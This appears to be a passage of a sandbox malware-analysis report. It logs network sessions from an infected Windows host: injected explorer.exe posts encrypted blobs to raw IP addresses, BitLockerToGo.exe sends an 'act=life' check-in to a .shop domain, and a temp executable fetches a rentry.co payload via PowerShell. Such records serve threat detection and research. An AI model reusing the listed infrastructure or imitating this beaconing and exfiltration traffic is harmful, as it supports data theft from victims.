2024-07-27 06:54:22 UTC	16320	IN	Data Raw: 76 00 61 00 6c 00 75 00 65 00 00 0f 63 00 61 00 70 00 74 00 69 00 6f 00 6e 00 00 0f 6d 00 65 00 73 00 73 00 61 00 67 00 65 00 00 15 74 00 61 00 72 00 67 00 65 00 74 00 4e 00 61 00 6d 00 65 00 00 00 cf 45 c3 b1 c8 dc ea 42 be 14 f1 dc 02 00 32 4a 00 04 20 01 01 08 03 20 00 01 05 20 01 01 11 11 04 20 01 01 02 04 20 01 01 0e 05 20 01 01 11 25 05 20 01 01 11 35 05 20 02 01 0e 0e 06 20 01 01 11 81 c9 06 07 02 1d 1c 1e 00 02 1e 00 08 00 01 12 81 f9 11 81 fd 08 20 02 1d 1c 12 81 f9 02 03 07 01 18 07 00 02 0e 12 81 f9 1c 05 00 02 0e 0e 1c 05 20 02 01 18 02 0a 00 02 12 51 12 82 05 11 82 09 0e 20 0b 01 08 06 06 05 05 05 05 05 05 05 05 05 00 00 12 82 0d 04 0a 01 12 19 03 20 00 0e 03 07 01 09 05 07 01 12 80 8c 05 20 02 01 1c 18 06 20 01 01 12 82 11 06 20 01 01 11 82 Data Ascii: valuecaptionmessagetargetNameEB2J % 5 Q
2024-07-27 06:54:22 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 66 b7 ea fe 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea ff 66 b7 ea fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ffffffffffffffffffffffffffffffffffffffff
2024-07-27 06:54:22 UTC	16384	IN	Data Raw: e9 6a 65 b6 e9 48 66 b7 ea 28 65 b6 e9 12 65 b6 e9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 65 b6 e9 10 65 b6 e9 24 66 b7 ea 41 65 b6 e9 65 66 b7 ea 94 65 b6 e9 c8 65 b6 e9 f5 66 b7 ea ff 65 b6 e9 fe 65 b6 e9 fe 66 b7 ea f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 b7 ea f0 65 b6 e9 fc 66 b7 ea b9 65 b6 e9 59 65 b6 e9 15 00 00 00 00 00 00 00 00 00 00 00 00 65 b6 e9 0f 66 b7 ea 25 65 b6 e9 3b 65 b6 e9 50 66 b7 ea 5e 65 b6 e9 64 65 b6 e9 6c 66 b7 ea 6c 65 b6 e9 63 65 b6 e9 5e 66 b7 ea 4f 65 b6 e9 3a 65 b6 e9 24 66 b7 ea 0f 00 00 00 00 00 Data Ascii: jeHf(eeee$fAeefeefeeffefeYeef%e;ePf^edelflece^fOe:e$f
2024-07-27 06:54:22 UTC	16384	IN	Data Raw: e6 62 53 ae e7 e9 52 ad e6 fe 52 ad e6 fe 53 ae e7 ff 52 ad e6 fe 52 ad e6 fe 53 ae e7 ff 52 ad e6 fe 53 ae e7 ff 53 ae e7 ff 52 ad e6 fe 53 ae e7 ff 52 ad e6 fe 52 ad e6 fe 53 ae e7 ff 52 ad e6 fe 52 ad e6 fe 53 ae e7 e9 52 ad e6 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 ae e7 0c 52 ad e6 51 52 ad e6 91 53 ae e7 c1 52 ad e6 e5 52 ad e6 fb 53 ae e7 ff 52 ad e6 fe 53 ae e7 ff 53 ae e7 ff 52 ad e6 fe 53 ae e7 ff 52 ad e6 fb 52 ad e6 e5 53 ae e7 c1 52 ad e6 91 52 ad e6 51 53 ae e7 0c 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 1f 00 e0 00 07 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c0 00 03 00 c3 c3 c3 00 c0 Data Ascii: bSRRSRRSRSSRSRRSRRSRbSRQRSRRSRSSRSRRSRRQS
2024-07-27 06:54:22 UTC	5726	IN	Data Raw: 14 dd ee 08 96 d7 ad 1c 19 2f 29 06 4c 0a fa 93 a6 9b 80 6a 20 ef eb 36 b3 f8 0b 7a fa a6 9f 30 40 c0 64 4e 23 b6 15 06 45 09 28 40 cb 83 61 6b 2a 8e 72 26 ed 9d 48 c7 c9 ef 2c 30 a3 f6 99 06 8b 4c 16 14 7d 03 6f 51 67 1f a2 c2 cc f5 ed 9c 1a c9 b4 b3 d1 9c c2 c4 e4 d4 d1 76 43 b8 08 d5 09 85 b5 e7 37 cf 73 0a c8 61 e1 7d 30 92 06 f9 e0 39 a3 b3 80 45 88 d0 7f 8a b3 bc 4b 14 43 02 03 01 00 01 a3 82 01 a9 30 82 01 a5 30 0c 06 03 55 1d 13 01 01 ff 04 02 30 00 30 1f 06 03 55 1d 23 04 18 30 16 80 14 36 bd 49 ff 31 2c eb af 6a 40 fe 99 c0 16 ed ba fc 48 dd 5f 30 7d 06 08 2b 06 01 05 05 07 01 01 04 71 30 6f 30 4b 06 08 2b 06 01 05 05 07 30 02 86 3f 68 74 74 70 3a 2f 2f 63 65 72 74 2e 73 73 6c 2e 63 6f 6d 2f 53 53 4c 63 6f 6d 2d 53 75 62 43 41 2d 45 56 2d 43 6f Data Ascii: /)Lj 6z0@dN#E(@ak*r&H,0L}oQgvC7sa}09EKC00U00U#06I1,j@H_0}+q0o0K+0?http://cert.ssl.com/SSLcom-SubCA-EV-Co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	50704	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:22 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:54:22 UTC	1122	OUT	Data Raw: 59 43 78 30 47 57 72 53 73 57 56 47 63 6a 65 79 45 31 57 44 77 61 43 70 45 31 77 4a 44 4e 69 33 6d 30 6f 61 4f 44 79 69 79 57 58 42 6e 6f 6b 4b 4e 5a 4b 70 5a 30 32 45 4b 42 42 58 64 57 63 78 6a 35 54 54 57 4a 5a 6b 4e 38 47 71 52 4f 63 78 41 42 4b 46 61 54 31 31 30 76 58 2f 2b 7a 35 51 47 73 59 42 67 55 69 42 5a 77 4d 62 4b 48 67 39 70 56 66 6a 6a 75 64 47 75 59 34 46 6b 44 54 7a 53 6a 4b 61 35 61 73 34 55 62 7a 30 4c 58 41 4d 75 35 65 6b 53 77 6e 6d 34 6c 41 57 77 34 4f 69 2f 38 6f 66 6a 46 55 4f 33 2f 38 58 73 75 54 4a 52 35 65 32 70 30 45 2b 76 55 7a 6b 66 79 56 62 4f 54 75 73 43 6e 4d 39 4e 49 62 56 46 33 33 71 7a 43 51 37 39 62 42 78 59 64 56 4b 62 46 2f 42 31 32 65 6f 6e 4c 2f 7a 59 6e 4b 51 51 49 75 53 6c 5a 6b 35 76 6e 34 56 75 6e 2b 78 42 77 57 Data Ascii: YCx0GWrSsWVGcjeyE1WDwaCpE1wJDNi3m0oaODyiyWXBnokKNZKpZ02EKBBXdWcxj5TTWJZkN8GqROcxABKFaT110vX/+z5QGsYBgUiBZwMbKHg9pVfjjudGuY4FkDTzSjKa5as4Ubz0LXAMu5ekSwnm4lAWw4Oi/8ofjFUO3/8XsuTJR5e2p0E+vUzkfyVbOTusCnM9NIbVF33qzCQ79bBxYdVKbF/B12eonL/zYnKQQIuSlZk5vn4Vun+xBwW
2024-07-27 06:54:24 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:23 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:24 UTC	685	IN	Data Raw: 31 73 55 49 37 42 66 62 77 53 38 49 69 6b 4a 57 44 4c 6b 58 79 71 67 61 2f 54 30 70 30 68 32 4b 79 6c 6a 74 66 2b 33 33 34 4c 36 78 41 41 42 59 59 4a 4d 76 79 38 4a 6a 69 48 6c 42 77 79 55 37 54 6d 4e 4d 6c 42 61 55 66 52 69 74 55 56 68 51 78 4c 79 66 2b 59 64 46 31 6c 5a 49 76 59 46 64 65 47 66 6d 4f 45 76 45 68 6d 33 34 61 70 34 41 47 31 39 35 6c 7a 51 4e 36 61 57 4f 2f 55 2f 7a 6d 56 30 74 6d 64 62 42 6a 63 68 6a 4f 6e 59 73 39 48 68 73 55 64 53 57 4c 4e 5a 4c 73 47 49 79 4d 6e 64 6f 4c 51 77 66 34 4d 31 68 2b 79 48 6e 47 48 38 36 6d 38 65 78 73 5a 74 38 6c 75 47 4b 53 54 34 6a 33 52 32 48 57 66 62 2b 79 6b 41 7a 36 57 69 74 63 33 6c 6c 4c 56 46 4e 78 49 6d 77 51 73 35 33 2f 54 62 41 36 42 66 66 72 41 74 33 32 57 2f 36 78 56 30 52 30 52 77 48 64 4c 66 Data Ascii: 1sUI7BfbwS8IikJWDLkXyqga/T0p0h2Kyljtf+334L6xAABYYJMvy8JjiHlBwyU7TmNMlBaUfRitUVhQxLyf+YdF1lZIvYFdeGfmOEvEhm34ap4AG195lzQN6aWO/U/zmV0tmdbBjchjOnYs9HhsUdSWLNZLsGIyMndoLQwf4M1h+yHnGH86m8exsZt8luGKST4j3R2HWfb+ykAz6Witc3llLVFNxImwQs53/TbA6BffrAt32W/6xV0R0RwHdLf

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	50709	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:24 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 06:54:24 UTC	1122	OUT	Data Raw: 70 71 6a 71 33 51 39 4a 49 57 64 6c 69 67 78 73 76 48 6b 4a 44 5a 33 72 48 50 69 73 61 48 67 48 66 5a 4e 78 75 45 6f 4a 4c 6e 6f 7a 46 52 36 4c 62 4e 36 51 41 74 7a 71 4e 51 36 6e 37 61 63 4d 67 41 6d 39 6b 4a 4d 4c 68 42 76 65 50 45 49 63 30 47 41 63 6a 74 71 6e 62 34 56 49 2f 4b 62 70 47 6b 6c 4a 45 45 48 75 53 44 52 4b 47 50 74 68 42 4a 66 78 76 66 56 37 52 52 75 54 42 38 2b 56 41 65 64 63 53 30 63 61 72 44 53 52 72 58 57 42 49 66 43 56 67 50 41 43 38 50 67 6c 35 73 53 48 6c 4d 73 5a 7a 68 65 65 71 70 45 59 73 6c 6f 6f 50 6f 75 52 51 79 4e 36 61 55 31 34 36 66 4b 30 4b 64 74 56 4c 45 67 44 64 2f 68 71 62 56 76 41 30 79 55 6a 6d 73 4a 69 7a 41 78 33 41 45 57 34 44 67 67 4b 73 30 38 50 44 76 47 32 33 32 6c 76 6f 6b 47 59 2b 56 41 69 4e 73 57 43 75 4e 62 Data Ascii: pqjq3Q9JIWdligxsvHkJDZ3rHPisaHgHfZNxuEoJLnozFR6LbN6QAtzqNQ6n7acMgAm9kJMLhBvePEIc0GAcjtqnb4VI/KbpGklJEEHuSDRKGPthBJfxvfV7RRuTB8+VAedcS0carDSRrXWBIfCVgPAC8Pgl5sSHlMsZzheeqpEYslooPouRQyN6aU146fK0KdtVLEgDd/hqbVvA0yUjmsJizAx3AEW4DggKs08PDvG232lvokGY+VAiNsWCuNb
2024-07-27 06:54:26 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:26 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:26 UTC	685	IN	Data Raw: 41 47 65 2f 73 52 72 50 72 64 53 79 41 78 4c 34 44 65 53 65 55 39 78 33 66 49 66 36 6f 71 65 79 2f 78 2b 57 33 31 51 65 34 58 35 48 70 31 74 56 56 51 62 31 49 6f 43 4c 4b 6d 37 4e 41 63 39 62 4f 56 44 68 47 48 6c 32 32 42 66 78 37 56 4b 58 35 2f 6c 4e 78 64 66 79 75 61 78 53 78 50 48 63 46 76 57 50 4f 37 48 2f 67 32 72 46 4d 67 6c 42 6e 61 2b 45 5a 34 62 32 50 58 77 74 67 53 6d 47 37 35 35 51 2f 32 57 48 4d 79 55 34 5a 62 4a 4b 44 76 77 2b 70 6c 41 42 4e 58 33 6c 55 46 77 47 69 5a 65 39 58 4c 4f 6f 6b 58 31 38 71 31 6d 78 64 6d 67 63 54 63 55 37 2f 45 41 56 37 70 2b 61 71 53 77 6d 53 31 75 67 63 44 6d 38 7a 70 49 66 43 4c 30 34 6f 69 6d 78 6c 63 69 48 54 63 74 65 67 57 49 64 53 6f 54 79 54 73 30 6d 6f 62 33 39 52 4c 49 37 64 53 56 46 6d 39 53 56 6c 6d 6f Data Ascii: AGe/sRrPrdSyAxL4DeSeU9x3fIf6oqey/x+W31Qe4X5Hp1tVVQb1IoCLKm7NAc9bOVDhGHl22Bfx7VKX5/lNxdfyuaxSxPHcFvWPO7H/g2rFMglBna+EZ4b2PXwtgSmG755Q/2WHMyU4ZbJKDvw+plABNX3lUFwGiZe9XLOokX18q1mxdmgcTcU7/EAV7p+aqSwmS1ugcDm8zpIfCL04oimxlciHTctegWIdSoTyTs0mob39RLI7dSVFm9SVlmo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	50712	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:26 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:54:26 UTC	1267	OUT	Data Raw: 5a 2f 35 57 42 77 38 62 31 77 62 64 4c 38 59 2b 70 61 36 54 4b 47 46 2f 6c 76 37 74 64 2f 48 50 56 30 56 5a 31 55 6c 44 66 50 42 4c 57 35 45 66 46 46 6c 50 36 65 66 55 67 79 6b 36 34 31 6e 71 37 33 43 61 4a 37 46 59 57 6e 32 73 48 73 31 46 79 78 34 67 68 74 30 32 6f 38 43 30 4e 74 49 4f 79 4e 49 49 63 2f 4d 35 75 44 45 6f 57 49 6a 50 63 4b 7a 77 57 53 62 6e 33 6c 34 44 46 56 51 66 58 53 4a 57 4c 42 56 53 55 59 31 43 36 41 66 32 63 79 53 53 71 71 31 6e 78 5a 58 54 55 2b 66 52 39 54 70 70 53 55 5a 6a 2b 66 6b 4e 58 64 6e 65 62 43 56 46 36 30 6f 6c 65 54 47 4c 32 68 4a 2b 74 43 7a 5a 47 6d 74 69 52 45 6a 44 71 50 4a 38 65 4e 31 75 6f 79 35 43 4a 61 70 6c 2b 47 32 49 37 4e 59 72 69 75 6f 30 79 4e 77 69 49 57 36 34 4f 4f 6b 70 6f 31 4d 73 53 30 4e 4b 71 6c 66 Data Ascii: Z/5WBw8b1wbdL8Y+pa6TKGF/lv7td/HPV0VZ1UlDfPBLW5EfFFlP6efUgyk641nq73CaJ7FYWn2sHs1Fyx4ght02o8C0NtIOyNIIc/M5uDEoWIjPcKzwWSbn3l4DFVQfXSJWLBVSUY1C6Af2cySSqq1nxZXTU+fR9TppSUZj+fkNXdnebCVF60oleTGL2hJ+tCzZGmtiREjDqPJ8eN1uoy5CJapl+G2I7NYriuo0yNwiIW64OOkpo1MsS0NKqlf
2024-07-27 06:54:27 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:27 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:27 UTC	685	IN	Data Raw: 47 4f 7a 4a 6f 35 31 73 64 50 58 4c 34 63 55 31 31 76 6c 37 64 48 6e 56 63 2b 4e 44 53 52 46 35 37 5a 6d 37 4c 4f 6d 44 43 54 4a 76 68 62 67 4f 55 65 4d 4c 63 4e 4b 38 52 41 58 79 33 4e 42 67 77 56 39 2f 31 75 44 78 6d 63 4d 56 39 71 34 4a 34 5a 4e 6d 6d 5a 47 6e 46 50 46 4f 74 6a 4c 4f 44 5a 6f 53 72 4f 6d 62 78 66 51 73 4d 71 61 6a 55 36 67 4a 30 4d 32 2f 5a 74 5a 35 55 6b 44 38 62 30 75 77 54 54 54 42 32 50 4f 6a 72 72 72 32 49 53 68 55 71 65 67 76 55 30 7a 2b 4e 4b 6c 30 62 6f 6b 68 42 4a 78 4f 4f 4c 71 56 33 4e 78 6d 4d 58 66 44 66 37 37 68 47 57 65 59 73 49 71 69 65 45 35 63 46 63 4e 58 63 76 64 54 50 57 42 31 57 7a 38 6a 6a 7a 6c 75 35 74 73 59 65 4f 61 55 77 54 56 77 42 34 6f 4d 64 4d 33 52 59 59 42 49 61 2b 33 63 4c 77 76 52 31 72 68 37 64 61 4a Data Ascii: GOzJo51sdPXL4cU11vl7dHnVc+NDSRF57Zm7LOmDCTJvhbgOUeMLcNK8RAXy3NBgwV9/1uDxmcMV9q4J4ZNmmZGnFPFOtjLODZoSrOmbxfQsMqajU6gJ0M2/ZtZ5UkD8b0uwTTTB2POjrrr2IShUqegvU0z+NKl0bokhBJxOOLqV3NxmMXfDf77hGWeYsIqieE5cFcNXcvdTPWB1Wz8jjzlu5tsYeOaUwTVwB4oMdM3RYYBIa+3cLwvR1rh7daJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	50715	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:28 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:54:28 UTC	1267	OUT	Data Raw: 4c 34 44 42 77 65 33 6f 74 6c 70 33 2b 4d 75 63 47 68 4f 4c 4f 4f 67 41 32 4f 71 68 39 53 7a 51 63 65 74 48 5a 68 30 6b 6b 52 62 4b 71 33 31 51 56 55 55 32 73 4d 69 38 47 64 42 51 4b 76 32 37 61 41 68 38 4f 72 54 6b 52 44 7a 5a 66 34 77 58 68 43 39 30 6a 61 49 52 49 78 56 47 6d 4e 67 6d 4e 4d 38 57 4e 59 6a 62 4c 6d 50 44 47 32 71 39 57 6b 43 68 50 62 73 45 71 56 63 4d 30 4a 34 63 34 4b 5a 68 30 65 57 6f 61 44 31 4e 59 77 34 33 79 79 4e 79 7a 6e 69 6b 41 74 71 38 48 66 75 4f 74 54 33 49 32 57 69 63 41 78 57 44 51 32 38 6e 66 72 6e 44 39 43 56 52 6d 70 31 73 4f 5a 31 41 47 4f 56 68 4d 54 73 76 78 77 7a 59 4f 35 77 6f 78 32 4c 74 70 47 51 76 37 51 73 6f 4f 76 74 56 57 46 72 52 34 49 4f 43 65 78 39 2f 54 46 55 7a 4d 74 32 43 58 74 71 2f 36 74 74 75 6c 41 63 Data Ascii: L4DBwe3otlp3+MucGhOLOOgA2Oqh9SzQcetHZh0kkRbKq31QVUU2sMi8GdBQKv27aAh8OrTkRDzZf4wXhC90jaIRIxVGmNgmNM8WNYjbLmPDG2q9WkChPbsEqVcM0J4c4KZh0eWoaD1NYw43yyNyznikAtq8HfuOtT3I2WicAxWDQ28nfrnD9CVRmp1sOZ1AGOVhMTsvxwzYO5wox2LtpGQv7QsoOvtVWFrR4IOCex9/TFUzMt2CXtq/6ttulAc
2024-07-27 06:54:29 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:29 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:29 UTC	685	IN	Data Raw: 6f 42 76 5a 75 6e 62 6b 2f 58 58 62 5a 64 4b 55 4f 52 52 77 5a 34 54 33 2f 6c 31 46 66 30 65 6b 50 74 77 2f 6d 4b 77 67 51 4e 33 6a 52 61 64 4d 44 2f 38 72 45 76 69 50 57 63 7a 34 33 70 76 44 34 63 4f 38 35 77 61 73 37 6f 6d 4a 4c 55 70 2b 42 73 4f 68 4b 52 74 75 53 79 76 45 57 62 67 59 44 75 62 6d 47 59 61 36 32 57 41 52 78 38 4a 41 6f 58 45 66 75 4d 6c 76 53 38 7a 44 38 66 54 2b 65 57 61 53 66 67 61 78 34 4c 58 47 59 61 45 30 58 43 66 33 38 75 33 75 63 46 45 76 56 2b 44 43 73 42 56 37 30 75 55 4f 77 31 6b 74 2f 6a 6d 71 63 6d 30 67 35 50 66 35 70 55 68 62 42 6d 51 4c 62 61 41 48 50 7a 76 7a 4f 74 75 69 39 73 6f 2f 66 68 75 34 70 33 61 56 4c 38 38 64 52 63 6f 54 50 59 32 76 38 31 4a 74 76 65 4b 74 41 67 37 37 4d 42 6e 43 74 4b 52 67 78 4b 79 34 69 34 75 Data Ascii: oBvZunbk/XXbZdKUORRwZ4T3/l1Ff0ekPtw/mKwgQN3jRadMD/8rEviPWcz43pvD4cO85was7omJLUp+BsOhKRtuSyvEWbgYDubmGYa62WARx8JAoXEfuMlvS8zD8fT+eWaSfgax4LXGYaE0XCf38u3ucFEvV+DCsBV70uUOw1kt/jmqcm0g5Pf5pUhbBmQLbaAHPzvzOtui9so/fhu4p3aVL88dRcoTPY2v81JtveKtAg77MBnCtKRgxKy4i4u

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	50717	188.114.97.3	443	3588	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:30 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: callosallsaospz.shop
2024-07-27 06:54:30 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-27 06:54:30 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 06:54:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2i2hh2viun1j7rjjm90tg357ci; expires=Wed, 20-Nov-2024 00:41:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P2AwwuXL4eP8S7MgVB1Fxm49I3j34%2BBz4zNKDTA3IoorosaeZX5Qf19Xm21dKeHvBYkimM4XiQSxyKAFM3HQqGtnuXbWc84OzYOQ2D6lypgGue7dPLQvgHtazaUctgMp3IchYmCq%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9ab7effedd8c11-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 06:54:30 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-27 06:54:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	50719	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:30 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 06:54:30 UTC	1267	OUT	Data Raw: 45 59 4b 51 47 70 5a 58 69 67 6f 54 76 32 53 56 70 55 67 6d 79 59 59 4b 35 43 4c 45 78 54 75 58 68 47 51 72 4f 41 69 55 37 42 43 54 65 34 6e 7a 46 6a 42 5a 73 43 37 72 75 4d 67 35 36 46 41 68 30 6e 56 76 72 34 59 61 6f 4f 78 42 75 55 31 64 78 30 4f 33 76 72 6d 62 6c 51 63 78 44 43 39 47 67 48 2f 66 4d 37 5a 6a 65 4a 73 37 39 4a 4e 48 67 65 72 76 44 35 44 59 30 44 62 65 34 37 55 45 65 30 39 77 39 5a 62 72 64 48 75 4c 51 51 51 4c 62 66 42 69 48 50 73 49 51 2b 70 2b 59 53 37 63 53 75 56 46 63 53 78 35 75 4b 63 52 36 70 6f 67 65 4f 63 65 46 77 66 61 6e 72 32 6e 49 76 55 75 4f 71 61 43 7a 6d 75 56 36 69 75 78 32 77 62 4b 57 56 34 66 34 34 6e 4b 7a 52 65 74 35 62 30 4a 70 69 67 45 58 59 63 72 4a 59 65 4f 4e 55 75 62 4f 32 2f 31 65 30 56 35 4c 61 77 51 4e 2b 57 Data Ascii: EYKQGpZXigoTv2SVpUgmyYYK5CLExTuXhGQrOAiU7BCTe4nzFjBZsC7ruMg56FAh0nVvr4YaoOxBuU1dx0O3vrmblQcxDC9GgH/fM7ZjeJs79JNHgervD5DY0Dbe47UEe09w9ZbrdHuLQQQLbfBiHPsIQ+p+YS7cSuVFcSx5uKcR6pogeOceFwfanr2nIvUuOqaCzmuV6iux2wbKWV4f44nKzRet5b0JpigEXYcrJYeONUubO2/1e0V5LawQN+W
2024-07-27 06:54:31 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 06:54:31 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 06:54:31 UTC	685	IN	Data Raw: 4b 6f 79 37 79 47 55 59 53 66 62 6b 53 59 69 77 49 39 73 32 4c 32 2f 62 33 33 54 31 70 2b 74 39 79 69 47 58 76 2b 2b 45 51 76 7a 73 30 6b 43 36 6f 4f 43 4d 78 33 78 59 61 57 4c 36 41 72 69 42 72 32 46 38 41 43 44 54 37 6b 48 65 32 4c 5a 43 66 31 31 37 77 39 34 70 6a 73 54 62 6a 30 34 56 71 50 43 42 70 59 54 6f 34 63 4d 37 62 46 55 4e 79 43 34 48 59 70 52 2b 44 47 35 43 54 38 6f 43 76 32 2b 6f 4f 6a 6f 6c 6e 42 68 2f 57 55 35 70 56 4a 62 49 75 5a 2f 34 35 74 30 38 2f 4d 6c 45 6e 30 78 63 4c 4b 4e 6c 53 42 52 42 32 72 52 41 58 37 34 46 31 6d 42 6d 79 50 7a 79 4c 44 6b 59 43 32 5a 6c 51 6c 74 31 6a 72 71 65 4c 46 56 72 67 6b 2f 77 4b 65 59 4a 62 6c 51 6a 6c 35 39 69 65 75 45 54 79 54 70 47 37 62 6b 33 48 52 75 45 46 62 66 7a 65 64 6d 54 4b 37 6b 63 46 6b 53 Data Ascii: Koy7yGUYSfbkSYiwI9s2L2/b33T1p+t9yiGXv++EQvzs0kC6oOCMx3xYaWL6AriBr2F8ACDT7kHe2LZCf117w94pjsTbj04VqPCBpYTo4cM7bFUNyC4HYpR+DG5CT8oCv2+oOjolnBh/WU5pVJbIuZ/45t08/MlEn0xcLKNlSBRB2rRAX74F1mBmyPzyLDkYC2ZlQlt1jrqeLFVrgk/wKeYJblQjl59ieuETyTpG7bk3HRuEFbfzedmTK7kcFkS

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	50720	104.26.2.16	443	3288	C:\Users\user\AppData\Local\Temp\BD9E.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 06:54:30 UTC	167	OUT	GET /microgods/raw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682 Host: rentry.co Connection: Keep-Alive
